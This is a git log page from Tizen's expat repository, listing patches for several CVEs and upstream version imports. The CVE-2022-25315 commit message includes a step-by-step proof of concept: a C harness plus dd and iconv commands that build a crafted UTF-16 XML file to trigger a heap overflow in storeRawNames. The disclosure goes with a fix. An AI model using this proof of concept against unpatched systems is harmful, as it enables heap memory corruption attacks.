review.tizen.org Git - platform/upstream/expat.git/log

[CVE-2022-25314] Prevent integer overflow in copyString

The copyString function is only used for encoding string supplied by
the library user.

Change-Id: Ibde587210ac056910253f1b1b3a8ffad5a85a357

[CVE-2022-25235] security patch

lib: Drop unused macro UTF8_GET_NAMING
lib: Add missing validation of encoding (CVE-2022-25235)
lib: Add comments to BT_LEAD* cases where encoding has already been validated

Change-Id: I29e52367b68d2d7d841630a43e5d86b55d96e2e5

[CVE-2021-45960] lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960)

Change-Id: Ia2074e6b6ff8a17db2548cf402817aa60c551d4c

[CVE-2022-25315] Prevent integer overflow in storeRawNames

It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>

#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
}
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```

Change-Id: I814c068538ee37bee414f477eb2dc13cc643e27c

[CVE-2022-25236]lib: Protect against insertion of namesep characters into namespace URIs

lib: Protect against malicious namespace declarations
lib: Fix (harmless) use of uninitialized memory

Change-Id: Ic1d24c7d23683b7894f8cfb2628ed7af95f2300c

Bump to expat 2.2.9

Change-Id: I7d021ad079cedc9b7997f608062810a062c211eb
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Merge branch 'tizen_base' of ssh://review.tizen.org:29418/platform/upstream/expat into tizen_base

Change-Id: I72e0b08c3adb36d5a932785e90c5b212be8778e2
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Rebase for expat 2.2.9

Change-Id: Iefa48ae57f7b2ae2e5fa0f9a8595583d5553136a
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Imported Upstream version 2.2.9

Change-Id: I4b545ba08f659e8498c67ad8fcbe99e7de52ef98
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Imported Upstream version 2.2.8

Change-Id: I85418cfc26789e98d42e484fbab9f79e855f1740
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Resolve circular dependency #2

Change-Id: Ia56be4ecc6b1c482f8044049e47f2c1d0a63a76a
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Resolve circular dependency

Change-Id: I803b11179834a7cd5068e6b4f4af9ab3146f63a8
Signed-off-by: Hyunjee Kim <hj0426.kim@samsung.com>

Merge branch 'sandbox/dh0128.kwak/expat_2.2.7' into tizen_base

Change-Id: I522684561ace8e4d720d0a9958f3fd6c9ab8f720
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Bump to expat 2.2.7

Change-Id: I4e4b013874aeff750cba30235fb95bc8d1c6ffbe
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.7

Change-Id: I4b1c0ed69acf4695f01bf2a07588920bab2487c3
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Bump to expat 2.2.6

[Model] All
[BinType] AP
[Customer] OPEN

[Issue#] N/A
[Request] N/A
[Occurrence Version] N/A

[Problem] version upgrade
[Cause & Measure]
[Checking Method] expat unit test

[Team] Open Source Management and Setting Part
[Developer] dh0128.kwak
[Solution company] Samsung
[Change Type] N/A

Change-Id: I13f112f072ba347e57c827b340ba4de32e74c2ae
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.6

Change-Id: I8bf03fb30c4edf6f5abad98c4bc0f2c1edd3ab1f
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.5

Change-Id: I43c77a5fe9b587a0729a17b57c984df2b8469afd
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.4

Change-Id: I7586c345c8d87644334e2099468648209135cc6c
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.3

Change-Id: I17040257185cebbd053acd143bd2ed00fa6b27a9
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.2

Change-Id: I181f0e23575cc2659bdffb87465300f20137c16a
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.1

Change-Id: Ia08917e04f3cce89cd7bca19ae7d7e03106ba6c9
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.2.0

Change-Id: Iee9db75e5afcc2251aa89282ca056dc7f358e4dd
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.1.1

Change-Id: Icfd7f759d085584ada07fb7182dae2643ef97795
Signed-off-by: DongHun Kwak <dh0128.kwak@samsung.com>

Imported Upstream version 2.1.0